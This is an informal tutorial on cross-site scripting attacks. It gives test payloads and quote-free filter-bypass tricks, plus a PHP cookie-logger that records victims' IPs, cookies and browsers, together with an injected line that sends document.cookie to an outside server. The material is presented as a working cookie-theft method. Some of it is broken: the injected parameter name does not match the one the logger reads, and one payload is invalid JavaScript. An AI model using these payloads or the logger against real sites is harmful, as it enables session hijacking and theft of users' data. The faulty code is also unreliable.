XSS - Cross Site Scripting

--[ How to find XSS vulnerabilities:

Find something where you can submit text for example a textbox.
Write this inside:
<script>alert("XSS");</script>

If the website is vulnerable it will alert a popup message saying "XSS".

With XSS you can make a picture display on the page if you want:
<IMG SRC="http://website.com/yourimage.png">

Or you can open other websites:

<script>window.open("http://www.google.com/")</script>

Or redirect:

<meta http-equiv="refresh" content="0;url=http://www.google.com/" />

--[ Cookie Stealing:

cookie.php
----------------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];

$data = "IP: " . $ip . "\n"
."Cookie: " . $cookie . "\n"
."Referrer: " . $referer . "\n"
."Browser: " . $browser . "\n\n";

$log = "cookies.txt";
@chmod($log, 0777);

$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);

@header("Location: $redirect");
?>
----------------------------------------

Upload this file to your server and make a text file "cookies.txt".

Now you must insert this code:

document.location="http://www.site.com/cookie.php?c=" + document.cookie

When the user visits the page that got injected their cookie will be stolen.

--[ How to bypass filteration

<script type=text/javascript>alert("XSS")</script>
<script>alert("/XSS"/)</script>
<script>alert("XSS");</script>
<script>alert("XSS")</script>;

This will alert a popup message saying "123" without using quotes:
<script>var nextlive = 123; alert(nextlive)</script>

Also you can use String.fromCharCode if you don't want to use quotes.

http://www.asciitable.com/

Find the decimal value of what you want to alert at the popup message.

For example:

<script>alert(String.fromCharCode(110, 101, 120, 116, 108, 105, 118, 101))</script>

This will alert a popup message saying "nextlive".